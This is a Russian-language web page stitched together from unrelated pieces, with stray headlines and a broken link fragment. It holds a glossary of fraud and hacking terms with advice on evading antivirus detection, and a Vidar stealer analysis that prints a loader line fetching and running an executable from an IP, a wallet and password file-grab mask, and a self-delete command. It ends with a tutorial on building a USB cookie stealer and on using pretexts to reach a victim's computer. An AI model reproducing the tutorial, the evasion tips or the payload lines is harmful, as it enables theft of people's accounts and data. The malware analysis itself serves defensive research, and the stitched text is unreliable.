Программа стиллер что это

В данной статье я попытался как можно короче и понятнее описать самые популярные виды мошенничества, интернет-атак, понятий криптографии и функций ПО, используемого злоумышленниками.

• Антикино (антик) — подразумевает приватный (префикс «анти»: анти кино, анти шашлычная) кинотеатр, расчитанный, как правило, на двух человек. Суть мошенничества заключается в перевоплощение девушкой в сети и поиск потенциальных возлюбленных в ВК, других соц. сетях или сервисах знакомств. После нахождения жертвы (мужчины) мошенник, используя навыки СИ, приглашает её в то самое антикино — фейковое. При успешном исходе жертва заказывает билеты на сеанс через поддельный сайт («скрипт»), отдавая тем самым свои деньги в чужой карман. В схеме антикино существует короткая иерархия — владелец антикино (заведует одним или несколькими сайтами одновременно, принимает деньги жертв) и мошенники-спаммеры (они получают бóльшую часть с дохода антикино и выполняют всю «грязную» работу — поиск жертв, развод на покупку билетов).

ПОЙМАЛ СТИЛЛЕР НА КОМП!

• Брутфорс (метод «грубой силы») [не путать с брутом] — способ взлома аккаунтов или иных видов информационных образов, защищённых паролем, методом перебора паролей. Существует 2 возможных сценария проведения: перебор паролей из базы наиболее популярных или применение соответствующих алгоритмов для поочерёдной выдачи каждого из возможных вариантов (пример: 0000, 0010, 0100, 1000, 1001 и т. д.). На данный момент брутфорс является наименее действенным методом взлома аккаунтов, так как его выполнение требует иррациональных затрат времени (перебор даже довольного слабого для нашего времени пароля может занять несколько часов, дней, лет, а то и десятилетий), кроме того следует отметить, что почти все сервисы, требующие ввод пароля легко распознают подобные атаки (часто даже расценивают как DoS или DDoS) и не дают злоумышленникам перехватить доступ к аккаунту, ограничивая к нему доступ, либо же используя системы проверки, такие как ReCaptcha.

• Фишинг — один из способов перехвата данных от аккаунтов, основывающийся на невнимательности жертв. Фишинг подразумевает загрузку на хостинг дубликата страницы целевого сайта или скрипта (полноценного сайта) под видом дочернего с формой для ввода логина и пароля.

После загрузки скрипта, мошенник находит жертв и с помощью СИ заставляет их перейти по ссылке на этот сайт, где они с определённой вероятностью введут свои действительные данные для входа. Как правило, на фишинговых сайтах стоит редирект (перенаправление на другую страницу), что позволяет подсунуть жертве настоящий сайт после нажатия кнопки «Войти» на фишинговом, не заостряя внимания на адрес сайта. Данный способ не является самым действенным, его актуальность с каждым годом понижается, ведь люди учатся на своих ошибках и вечно подменять сайты не получится. Также следует отметить, что фишинговые сайты пытаются всячески дублировать домены целевых сайтов. Так, фишинговый сайт, дублирующий facebook.com может занять домен fecabook.co, facebok.de или любой похожий.

ОСТОРОЖНО! Самораспространяющийся Стиллер RedLine Атакует Геймеров через YouTube

• Шип (шиппинг) — процесс заказа тех или иных товаров в интернет-магазинах с целью реализации средств на взломанных аккаунтах. Если мошеннику в руки попадает аккаунт торговой площадки с неким балансом, и при этом у него нет возможности перечислить эти средства непосредственно на карту, он заказывает один или несколько товаров, которые в сумме полностью покрывают целевой баланс. Таким образом злоумышленник вместо денег получает материальные предметы, которые он может либо использовать в собственных целях, либо перепродать. Сейчас шиппинг является довольно популярной практикой, поэтому найти шипперов, которые готовы вывести средства с вашего (или чужого) аккаунта путём подобных махинаций за конкретную плату или процент не составит особого труда.

• Подмена офферов (trade substitution) — вид мошенничества, суть которого заключается в отправке фейковых трейдинг-предложений (как правило предложений обмена в рамках сервиса Steam) с целью обмануть жертву на игровые вещи или валюту. Для этого мошенники отслеживают отправляемые трейд-офферы специальных ботов доверенных сервисов (например торговых или игровых площадок) и незамедлительно отправляют идентичное предложение (в свою пользу) с аккаунта, точно повторяющего вид того самого бота (включая имя, аватарку, данные профиля). Таким образом, подмена офферов нацелена на невнимательность жертв, поэтому для проведения этого вида мошенничества часто используются навыки СИ (например при поиске потенциальных жертв).

• Адвёртинг — способ мошенничества, при котором злоумышленник преподносит жертве вредоносные файлы под видом цели рекламного (коммерческого) предложения. Мошенники ищут жертв, имеющих некую популярность, которые принимают коммерческие предложения для монетизации своего творчества на различных площадках (например на YouTube), после чего связываются с ними от имени PR-менеджеров (и не только) «развивающихся» компаний и проектов, предлагая рекламу своего цифрового продукта (антивируса, сервиса облачного гейминга и т. д.). После принятия предложения, жертва загружает себе на ПК вредоносное ПО под видом рекламируемого продукта, тем самым отсылая свои логи (логины, пароли, сессии и т. д.) злоумышленнику. Как правило, адвёртинг имеет целевой объект, например канал на YouTube для последующей продажи.

• DoS и DDoS (Distributed Denial of Service) — два вида атак, использующиеся для выведения из строя интернет-ресурсов методом многочисленных отправок пакетов данных (как правило не несущих смысла,) на целевые сервера. Различия между ними просты — DoS выполняет задачу, используя всего 1 девайс, DDoS — множество.

На данный момент DoS-атаки считаются устаревшими и неспособными «положить» (вывести из строя) среднестатистический веб-сайт. Для проведения DDoS-атак требуется больше систем с выходом в интернет, однако они могут представлять действительную угрозу даже крупным интернет-ресурсам, нагружая беспрерывным потоком данных их сервера.

Для использования DDoS применяется специальное ПО или веб-сервисы — стрессеры. Они позволяют контролировать опасный трафик и регулировать его мощность (чем больше запросов и чем больше данных отправляется на целевой сервер, тем выше вероятность успешного проведения атаки). Пусть DDoS и остаётся довольно опасным и по сей день, существует ряд сервисов, способных ему противостоять, самый популярный из них — CloudFlare, принимающий весь поток трафика, направленный серверу-адресату, на себя. Все необходимые для DDoS мощности либо покупаются на хостингах (сервера и др. сетевые устройства), либо используют ПК и смартфоны, подключённые к сетям Ботнет.

• Спуфинг — процесс перехвата и подмены потока данных. Спуфинг-атаки популярны в публичных местах с доступом в интернет (например кафе). В случае с сетью Wi-Fi злоумышленник использует ноутбук или смартфон для фальсификации трафика путём выдачи ложных данных о том, «что является роутером».

Да, может показаться странным, но оно так и есть: девайс подключается к сети Wi-Fi и «говорит» всем устройствам в сети, что якобы он является роутером, перенаправляя тем самым весь трафик на себя. Так, злоумышленник может просматривать пакеты незашифрованных данных, исходящих от жертв и подменять как их, так и пакеты, возвращаемые от сервера (например, он может внедрить майнер в обычную HTML-страницу или поменять возвращаемые изображения на собственные). Спуфинг является действенной, простой (с точки зрения реализации) и довольно зрелищной атакой, актуальной и по сей день.

• Кapдинг [не путать с картингом , опасно для жизни] — вид мошенничества с использованием чужих платёжных карт. Как правило, подразумевает кражу и вывод средств с карты в материальные деньги. Кapдинг имеет высокую степень опасности, поэтому злоумышленники часто используют дропов (людей, которые выполняют противозаконные действия вместо самого мошенника, остающегося в тени, за некоторую плату или процент от дохода). Кapдинг имеет несколько подуровней, один из которых — скимминг (воровство платёжной карты методом копирования её основных идентификационных данных). Для скимминга злоумышленники используют специальные устройства — скиммеры, которые способны считывать магнитные дорожки карт, и инструменты слежки, такие как скрытые видеокамеры для считывания вводимых жертвой данных (в частности PIN-кода).

• Стиллер (граббер) — вредоносная программа, использующаяся злоумышленниками для быстрого сбора данных с устройства жертвы и последующей отправки в соответствующую базу. Стиллеры принято маскировать под рядовые программы, меняя иконку и название файла, вшивая их в уязвимые документы с помощью эксплоитов, склеивая с целевыми программами и «криптуя» их (меняя и защищая содержимое вредоносного файла так, чтобы он не поподал под определение зловреда при проверке антивирусами).

Также следует отметить, что стиллеры имеют малый размер и зачастую применяются в связке с программами-лоадерами, которые скачивают их самостоятельно, вызывая меньше подозрений. Стиллеры способны воровать любые данные с ПК и даже расшифровывать их. После сбора необходимых логов (куки-файлов, файлов сессий, данных платёжных карт) и создания соответствующих баз, стиллер, как правило, архивирует их и отправляет в конечную точку назначения — в руки злоумышленника (а если конкретнее, в веб-панель, на почту или на FTP -сервер). Стиллер является одним из самых действенных способов взлома аккаунтов за счёт своей скрытности и скорости работы. Запустив его, вам навряд-ли удастся вернуть свои данные обратно, единственный способ помешать отправке логов — незамедлительно выключить свой ПК, опередив её.

• RAT (ратник, троян, RMS, Remote Manipulator System, Remote Access Trojan) — вредоносное ПО, призванное перехватывать контроль над ПК своих жертв. RAT действует по специальным протоколам (например VNC ), дающим злоумышленнику возможность видеть экран жертвы, загружать, скачивать и запускать файлы, подключаться ко внешним носителям и устройствам, таким как веб-камера, микрофон, дисковод и т. д (тем самым создаётся эффект удалённого рабочего стола). В некоторых случаях, RAT можно использовать в роли стиллера, однако это может занимать некоторое время. Для связи с ПК злоумышленника RAT использует открытые порты (но есть исключения). Несмотря на свой обширный функционал ратники имеют довольно малый вес и маскируются точно так же, как и стиллеры или майнеры.

• Майнер — вредоносная программа, добывающая криптовалюту силами вычислительных мощностей ПК жертвы. Майнеры, как правило, адаптируются к диагностическим данным ПК, прибавляя или убавляя мощность для снижения шанса быть обнаруженными жертвой. Майнеры маскируются так же, как и стиллеры или ратники. Они прикрепляются к криптовалютному кошельку злоумышленника и « майнят » BTC, ETH и т. д., используя для этого мощности CPU (процессора), GPU (видеокарты) или других вычислительных элементов пк (реже), таких как электросхемы.

• Билд [не путать с билдером] — конечный вредоносный файл, создающийся билдером . Так как любой стиллер, ратник или майнер должен иметь хоть какой-то контакт со злоумышленником (например знать адрес общего сервера, базы данных или панели управления), существует понятие дочернего файла — билда и родительского — билдера. Суть их взаимодействия такова: злоумышленник открывает билдер, где указывает все связующие данные (они были перечислены ранее), а также локальную информацию будущего зловреда (название, иконку, описание и т. д.), билдер же в свою очередь компилирует билд (воссоздаёт стандартный шаблон вредоносного файла), при этом изменяя значения, указанные злоумышленником. На выходе получается готовый к использованию вредонос, который пусть и сделан по шаблону, но при этом имеет уникальные связующие данные и внешний вид.

• Лоадер — ПО, предназначенное для самостоятельной загрузки файлов с сервера на ПК. Лоадеры используются для заражения целевых ПК стиллерами, майнерами, ратниками и т. д. Лоадеры загружают и запускают файлы, минуя фаервол , однако не являются необходимыми для проведения атак. Лоадеры имеют очень малый вес и часто склеиваются с обычными программами, которые жертва захочет скачать. Лоадеры также можно использовать в более мирных целях, например для реализации системы лицензий приватного ПО.

• Криптор — инструмент, позволяющий злоумышленникам понижать детект (шанс опознания антивирусом) вредоносных файлов. Крипторы используют разные методы шифрования и модификации для изменения сигнатуры (отпечатка файла), используемой антивирусами для сравнения уже известных вирусов с проверяемыми. Крипторы принято распространять в приватном доступе, так как после детекта одного файла, закриптованного им, шанс детекта остальных повышается. Лучший способ защитить зловреда — это криптовать его и ни в коем случае не «заливать» на VirusTotal (т. к. этот сервис согласует все детекты и не-детекты со всеми антивирусами-партнёрами).

• Дедик (дед, VDS, Dedicated Server) — удалённый рабочий стол, используемый для распределения мощностей и беспрерывной работы ПО. Дедики приобретаются через услуги хостингов ( VDS ) и, как правило, могут использоваться с абсолютно любыми целями.

Они используют специальные протоколы, такие как RDP (Remote Desktop Protocol) для связи с устройством-клиентом (в его роли может выступать даже смартфон). Дедики полностью дублируют функции рядовых ПК, однако работают на серверах и используют серверные ОС , самая популярная из которых — Windows Server . Зачастую на дедиках присутствуют некоторые ограничения (дисковое пространство, трафик и т. д.), которые согласовываются с хостингом при выборе тарифа и очень гибко настраиваются. Визитной карточкой дедиков является скорость трафика. Она в разы выше среднестатистической из-за их расположения вблизи дата-центров и интернет-передатчиков, выдающих «космические» скорости, позволяющие обеспечивать обменом данных сразу десятки, сотни, а может и тысячи серверов одновременно.

• Социальная инженерия (СИ) — совокупность методов воздействия на человека с целями получения необходимого результата. СИ применяется в большинстве случаев мошенничества для «раскрытия» жертвы и получения информации, личных данных. В случае с реальной жизнью, СИ помогает людям руководить себе подобными и менять образы в интересах смягчения всякого рода преград и конфликтов. Используя СИ, человек пускает вход многие социальные навыки и подбирает себе подходящий образ, манипулирует и строит свою речь в выгодном для него положении.

• Компиляция — процесс преобразования предметно-ориентированного языка программирования на машинно-ориентированный. Компиляция подразумевает перевод исходного кода в программу, готовую к запуску операционной системой или программную библиотеку. Самое известное расширение, получаемое на выходе компиляции — .exe, однако кроме исполняемых файлов так же можно компилировать код в библиотеки DLL , LIB и др. Компиляция производится специальным ПО — компиляторами. Также стоит отметить, что скомпилировать код на абсолютно любом языке не получится, так как существуют ещё и интерпретируемые языки программирования (на выходе получаются «скрипты»), такие как Python, JavaScript, PHP и др.

• Декомпиляция (реверс) — процесс извлечения исходного кода из скомпилированного ПО. Для декомпиляции используются специальные программы — декомпиляторы, воссоздающие эквивалентный оригинальному код на определённом языке программирования. Нужно отметить, что этот процесс не может дать абсолютно идентичного с оригиналом кода, эта самая степень идентичности определяется количеством входных данных, а также самим языком, на котором была написана программа. Так, ПО, написанное на C++ декомпилировать будет сложнее, чем аналогичное на C# . Для полноты картины следует использовать различные анализаторы, они помогут разобрать байт-код , просмотреть значения переменных в HEX и т. д.

• Хеширование — математический процесс преобразования данных в короткую (относительно входного потока) строку определённой длины. Существует множество алгоритмов хеширования (например MD5 , SHA-1 , CRC32 ), и большинство из них не позволяют получить из хеша полностью идентичную оригиналу строку. Хеш-функция имеет две характеристики — скорость вычисления и количество « коллизий » (искажений, сходств). Некоторые хеш-функции основываются на делении, некоторые на умножении, но любая из них будет выполняться лучше других для определённой цели или блока информации. Не стоит забывать, что смысл хеширования заключается не в уменьшении объёма данных, а в ускорении их проверки на целостность и поиске дубликатов, а также в идентификации файлов как подлинных, лицензионных.

• Хеш (хеш-сумма) — идентификатор (не сжатое содержимое) информации (в частности файла), определённый соответствующей хеш-функцией (технологией хеширования). Строка хеша является отпечатком того или иного файла, при изменении содержимого которого хеш так же будет изменён. Таким образом, хеши можно применять для проверки файла на целостность, уникальность и подлинность (в случае с лицензиями). Также стоить отметить, что у двух разных файлов не может быть одинаковой хеш-суммы.

Пиратский софт и его последствия: анализ самого старого и простого вирусного плацдарма в интернете. Часть 2

Приветствую, эта статья является логическим продолжением анализа самого старого вирусного плацдарма в интернете. В предыдущей публикации мы с вами рассмотрели в деталях одну из последних обнаруженных угроз — Raccoon Stealer. Но для подробного анализа его собрата, стиллера Vidar, банально не хватило места, поэтому он будет описан в этой статье.

Не так давно французская компания, специализирующаяся на кибербезопасности, сообщила о том, что с начала 2020 года с помощью целой сети из поддельных сайтов и фейковых доменов распространялись два вредоноса — Raccoon и Vidar.

Все эти атаки были нацелены на недальновидных пользователей, пользующихся крякнутыми приложениями. В прошлой статье было проведено небольшое исследование, в ходе которого выяснилось, что 9 из 10 пиратских приложений содержат в себе вирус. В некоторых случаях деструктивный потенциал этих вредоносов определялся как критический, и после установки заветного кряка ваше устройство мало того, что передавало бы конфиденциальные данные злоумышленнику, так ещё и могло выйти из строя.

Примечательно также, что преступники использовали для распространения вредоносов популярные поисковики, а также прием SEO poisoning, то есть отравление поисковой выдачи.

SEO poisoning (отравление поисковой выдачи) — это добавление на скомпрометированные сайты слов, способствующих подъему этих сайтов в поисковой выдаче Google. Благодаря этому вредоносные сайты могут посетить больше потенциальных жертв. Например, при запросе «скачать Sony Vegas crack» с большой вероятностью первые пять результатов будут содержать вредоносное ПО.

Пути заражения: отличия Vidar от Raccoon Stealer

В отличие от Енота, Vidar никогда не продавался на закрытых форумах и телеграм‑каналах, этот вирус доступен лишь ограниченному кругу лиц, занимающихся его распространением. Также Raccoon был ориентирован в основном на русскоязычный сегмент, Видар же ни в чем не ограничивается, способен действовать по всему миру. Пример тому — попытка его распространения в Северной и Южной Корее через обычную почтовую рассылку, где злоумышленник выдавал себя за торговую комиссию.

Содержимое электронного письма побуждает жертв открыть вложенный файл, замаскированный под официальное письмо с запросом. Если жертва запустит файл из вложения, имитирующий значок файла документа, произойдет заражение стиллером Vidar.

В последнее время стиллер активно использует маскировку под «активаторы» для операционной системы Windows. Так уж заведено, что не все хотят покупать достаточно дорогую лицензию, поэтому достаточно большое количество пользователей прибегают к использованию нелегальных программ, дающий доступ ко всем функциям ОС бесплатно.

Как и Енотик, этот вредонос не распространяется с помощью критических уязвимостей или вирусных загрузчиков, типа TrueBot, поэтому, чтобы не стать очередной жертвой — достаточно лишь не посещать сомнительные сайты и не скачивать подозрительные вложения с электронных писем себе на устройство.

Краткий статистический анализ вредоноса

Зловред написан на C++, начал свою деятельность в начале октября 2018 года, ему свойственны все классические черты стилеров:

• Поиск определенных файлов
• Кража ID из куки браузеров
• Кража истории браузера (также из браузера tor )
• Кража криптокошельков
• Кража данных из программного обеспечения 2FA
• Захват сообщений из мессенджеров
• Скриншоты
• Настройки загрузчика
• Уведомления Telegram (на стороне сервера)
• Получение полного снимка всей информации о компьютере‑жертве

Итак, для статистического анализа будем использовать следующий набор утилит, все они являются бесплатными и находятся в открытом доступе:

1. DIE — Detect it Easy: многофункциональный инструмент, имеющий просто огромный арсенал. Позволит нам опередить тип компилятора вредоноса, язык, библиотеки и таблицы импорта/экспорта с последующим дизассемблированием.
2. Hidra — как и прошлая утилита, уже светилась в моей статье. Прекрасный и многофункциональный инструмент для реверс‑инжиниринга.
3. IDA PRO — также инструмент для реверс‑инжиниринга. Изначально рассматривался как дополнительный инструмент, но в этой статье, как и в прошлой, его роль была почти что основной.
4. Reko — декомпилятор, также знаком нам с прошлых статей.

Что ж, приступим. Заполучив образец вредоноса, нашему взору открывается следующая картина:

1. Достаточно странная иконка, отдаленно напоминающая блокнот.
2. Размер вредоносного файла составляет 193 КБ, что на порядок больше, чем у Raccoon.
3. Указана какая‑то версия — 27.0.0.0, и на этом информация закончилась.

Воспользуемся DIE для получения более подробной информации.

И информация здесь просто идентична той, которую мы видели при анализе Енота, настолько, что указанное время компиляции такое же. (Это наталкивает меня на мысль, что автор/авторы Енота и Видара или сотрудничают, или являются одними и теми же людьми). Помимо этого, образец представляет собой PE файл, а для компиляции был использован Microsoft Visual C/C++(2008–2010). Написано сие чудо на C/C++.

Исключительно ради интереса, образец был выгружен на VirusTotal, и результаты сканирования меня повергли в шок, ведь большинство популярных антивирусных приложений игнорируют очевидную и никак не замаскированную угрозу. Процент обнаружения составил 20 из 56. Приложения Avast, ESET NOD32, Kaspersky и Yandex — никак не отреагировали.

Что ж, перейдем к более глубокому анализу, Гидра отказалась работать с PE файлами. Не к удивлению, а в очередной раз. Поэтому тут нас выручит IDA PRO, с помощью которого мы сможем детально рассмотреть зловреда. Приступим.

После инициации на устройстве жертвы вредоносное ПО производит следующие действия.

• Импорт библиотек.
• Проверка или создание мьютекса.
• Деобфускация значений и проверка связи с командным сервером.
• Загрузка дополнительных легальных DLL файлов.
• Запрос конфигурационных данных с CC сервером. По сравнению с прошлым подопытным, здесь их намного меньше и нет никаких матерных выражений. Они аналогично представлены в виде шифровки RC4 и Base64. Связь с командным сервером никак не шифруется.

  RC4 — это потоковый шифр, широко применяющийся в различных системах защиты информации в компьютерных сетях. Шифр разработан компанией RSA Security. Алгоритм RC4, как и любой потоковый шифр, строится на основе генератора псевдослучайных битов. Подробнее о тонкостях его работы и реализации можете узнать вот здесь.

  

  Далее происходит процесс проверки соединения с командным сервером, как и в Раккуне, это происходит банальным путем пингования.

  Самое интересное, что если расшифровать эти строки, то они будут идти к публичному игровому сервису FACEIT, а именно к его API.

  FACEIT — киберспортивная платформа, основанная в Лондоне в 2011 году. Компания учреждала лиги для таких игр, как Counter-Strike: Global Offensive, League of Legends, Rocket League, Tom Clancy’s Rainbow Six Siege, Dota 2 и Team Fortress 2.

  

  И метод использование API интерфейса FACEIT имеет множество плюсов, ресурс faceit.com нельзя заблокировать, потому что это обычный сайт.

  Согласно методу, используемому Раккуном, если командный сервер заблокирован или отключен — вредоносное ПО становится абсолютно бесполезным. Vidar к подобному неуязвим.

  После расшифровки этой строки вирус производит подключение по адресу:

  Это страница, на которой размещен тот самый первичный конфиг вредоноса, то есть базовые инструкции. Они могут варьироваться в зависимости от предпочтений злоумышленника.

  Имеют они следующий вид:

  

  Также в этом списке имеется ссылка на скачивание дополнительных DLL файлов.

  4. Загрузка дополнительных легальных DLL файлов

  Чем дальше разбираю этот вредонос, тем больше утверждаюсь в мысли, что разработчики Vidar и Raccoon — это одни и те же люди. Подтверждение этому увидите далее.

  После успешного выполнения предыдущего шага, вирус запускает процесс скачивания дополнительных легальных DLL файлов, которые будут использованы для реализации вредоносных функций. Их список практически никак не отличается от предыдущего испытуемого:

  1. freebl3.dll
  2. mozglue.dll
  3. msvcp140.dll
  4. nss3.dll
  5. softokn3.dll
  6. vcruntime140.dll
  7. msvcp140.dll

  Примечательно также то, что скачанные DLL файлы будут сохранены в отдельную папку, созданную вредоносом. Размещена она по следующему пути:

  C:ProgramDatalocaldekddsshyperv

  Как можно заметить, здесь отсутствует файл sqlite3.dll, так как в стиллере не реализован метод кражи данных посредством SQL запросов.

  Затем стиллер произведет запрос к C%DESKTOP%;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;

  Эта страница может меняться в зависимости от предпочтений злоумышленника, но в большинстве случаев не модифицируется.

  Если вы читали предыдущую статью, то можете догадаться, что следом пойдет процесс сбора информации о хосте жертвы, стиллер соберет следующие данные:

  • имя пользователя,
  • версия операционной системы,
  • часовой пояс и системное время в формате файла,
  • техническую информацию: название процессора, видеокарты и количество оперативной памяти,
  • установленные приложения и средства отображения (веб-камеры, мониторы и прочее).

  Следующие фрагменты кода, отвечающие за этот шаг, удалось расшифровать:

  

  5. Непосредственная кража данных

  В отличие от своего собрата Раккуна, Видар не имеет возможности взаимодействовать с большинством браузеров. Из-за отсутствия реализации DLL файла sqlite3.dll, функционал этого стиллера заметно урезан. Поэтому единственное, что он может сделать, это своровать cookie-файлы из Firefox`а. Это будет реализовано посредством дополнительного файла mozglue3.dll и запроса к файлу logins.jscon. Воровство печенек очень ограничено, но если учесть, что количество активных пользователей Firefox в конце второго квартала 2022 года составило 198 млн человек в месяц, то проблемы в этом никакой нет.

  Далее производится поиск файлов wallet.dat, напоминаю, что этот файл содержит в себе сид-фразу и прочую информацию о криптокошельке. Актуально лишь для пользователей приложений от криптокомпаний. Интересно также то, что вредонос способен производить поиск файлов с любым расширением.

  Но кое-чем Видар все же примечателен, он способен сжимать отдельные папки в ZIP файл и отправлять их на командный сервер. Сделано это, скорее, для удобства. Представим себе следующую картину: злоумышленник успешно установил каким-то образом вредонос на устройство жертвы, и допустим, что это была атака на конкретную личность.

  Злодей заведомо знает, какие ему нужно похитить компрометирующие материалы: фото, видео и так далее. Естественно, жертва, как и большинство людей, хранит эти материалы в соответствующих папках. Чтобы не скачивать файлы по отдельности, гораздо быстрее будет сжать всю папку в ZIP-архив.

  Название архива уникально для каждого устройства и состоит из MachineGUID.

  Как и Раккун, этот вредонос может делать снимки экрана и отправлять их на командный сервер. На скрине ниже будет фрагмент кода, отвечающий за это действие:

  

  Этот процесс является необязательным и инициируется злоумышленником. Условием выполнения этой функции является наличие в файле конфигурации следующей строки: `scrnsht_.

  6. Установка дополнительного вредоносного ПО

  Этот шаг является обязательным и выполняется всегда, отвечает за этот процесс следующая строка в конфигурационном файле:

  ldr_1:http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%|exe

  Выбор полезной нагрузки, загружаемой вредоносом, остается за злоумышленником, в анализируемом образце находился обычный Java кейлоггер Spybee, который находится в открытом доступе на платформе GitHub. Спорный выбор. Почему был выбран именно он — загадка.

  

  Также в этой строке светится дополнительный сервер, который на данный момент недоступен, поэтому более глубоко проникнуть в инфраструктуру вредоноса пока что невозможно.

  7. Самоуничтожение

  Подобный шаг был недоступен Raccoоn’у, после запуска на устройстве жертвы он оставался там до талого. Видар же может незаметно проникнуть в систему, сделать все свои грязные дела и уйти незамеченным.

  Удаление происходит очень примитивным образом и представляет собой запуск следующей строчки через CMD Windows:

  “C:WindowsSystem32cmd.exe” /c taskkill /im [Filename] /f exit

  Краткий динамический анализ вредоноса

  Все тесты проводятся на виртуальной машине, ни в коем случае не повторяйте этого самостоятельно, тем более на основном устройстве.

  Для динамического анализа у нас уже имеется следующий сетап утилит (все они находятся в открытом доступе):

  1. ProcessHacker — простенько и со вкусом, понаблюдаем за тем, как вирус взаимодействует с другими .dll и системой.
  2. TCPView — утилита, которая прослеживает исходящие TCP соединения.
  3. Regshot — очень простое приложение с открытым исходным кодом, которое позволит просмотреть изменения в реестре после запуска вредоноса.

  Делаем слепок реестра Windows, открываем все наши утилиты и внимательно следим за происходящим.

  Сразу же после открытия вредоноса на виртуалке появляется второй процесс explorer.exe, в котором большая буква “i” заменяет маленькую “L”. Это излюбленный прием маскировки зловредов, стоит отметить, что неопытный пользователь вряд ли сможет отличить настоящий explorer от поддельного.

  Сперва Видар обращается GET-запросом к следующему IP адресу: 104.17.63.50. Как и предполагалось, этот сервер принадлежит сервису FACEIT.com.

  Далее вредоносный процесс устанавливает соединение с сервером 93.184.220.29, напоминаю, что именно этот сервер отвечал за выгрузку дополнительного вирусного ПО на машину жертвы.

  

  Спустя секунд 30 процесс исчезает из поля зрения. Если бы на моей машине был установлен пакет Java, то произошел бы запуск кейлоггера SpyBee, а так как библиотеки нет, вторичного вредоноса тоже нет.

  При сравнении слепков реестра можно отчетливо видеть, как Видар заметал следы, удаляя себя:

  

  А ещё вредонос, помимо этого, ещё и удалил косынку. Зачем? За что? Загадка века.

  Немного анализа профиля Faceit и его API

  Итак, у нас имеется никнейм злоумышленника, этот аккаунт на данный момент активен. На нем не сыграно ни одной игры, и он просто висит как пустышка.

  Именно этот аккаунт был зарегистрирован 15 декабря 2022 года в России, практически три месяца назад.

  

  Ранее исследователи Cyble обнаружили ещё несколько таких профилей, использующихся в качестве Chttps://habr.com/ru/companies/first/articles/717944/» target=»_blank»]habr.com[/mask_link]

  Делаем флэшку для кражи паролей

  Cтатья носит образовательный характер, мы ни к чему не призываем и не обязываем. Информация представлена исключительно в ознакомительных целях.

  Стиллер ворует cookie с браузера и с помощью специальной программы расшифровывает их. На выходе вы получаете готовые пароли. Для тех кто в бункере: сookie-файлы — зашифрованные текстовые документы, в которых хранится основная информация о пользователе, который юзает браузер. В эту информацию входит статистика использования браузера, персональные настройки, сохранённые логины и пароли, а также многое другое.

  Плюсы и минусы способа

  1. Есть смысл стиллить куки только тогда, когда вы уверены, что жертва сохраняет пароли в браузере.
  2. Несовместимость с WINDOWS 10, и последними версиями семёрки
  1. Метод не палится антивирусом.
  2. Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку и тд.

  НУ А ТЕПЕРЬ К ДЕЛУ

  Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй — “stealer.bat” *.bat — исполняемое расширение файла. Т.е. его можно использовать как программку*

  В первый прописываем такие строчки:

  Первый файл отвечает за автозапуск стиллера. Второй — непосредственно сам стиллер. Его следует наполнить такими строчками:

  После этого “скрываем” получившиеся файлы, и можем идти стиллить пароли и после того, как операция выполнена успешно — возвращаемся домой, через “Панель управления->Оформление и персонализация->Показ скрытых папок и файлов” отображаем скрытые на флешке файлы.

  Свои куки на СВОЁМ компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.

  Теперь Скачиваем WebBrowserPassView. Лично я использовал портативную версию. В этой программе уже ничего не надо нажимать — она сама загрузит и расшифрует куки из ваших браузеров. Напоминаю, не забудьте заменить свои файлы на полученные!

  Возвращаясь к минусам, описанным выше следует решить какой способ стиллинга использовать. Если у жертвы стоит последняя версия винды семёрки, или вообще десятка, тогда стиллинг лучше всего осуществлять вручную. То есть надо прийти к жертве домой, естественно заранее придумав предлог, подключить флешку к ПК, и запустить батник вручную.

  Источник: ib-tree.medium.com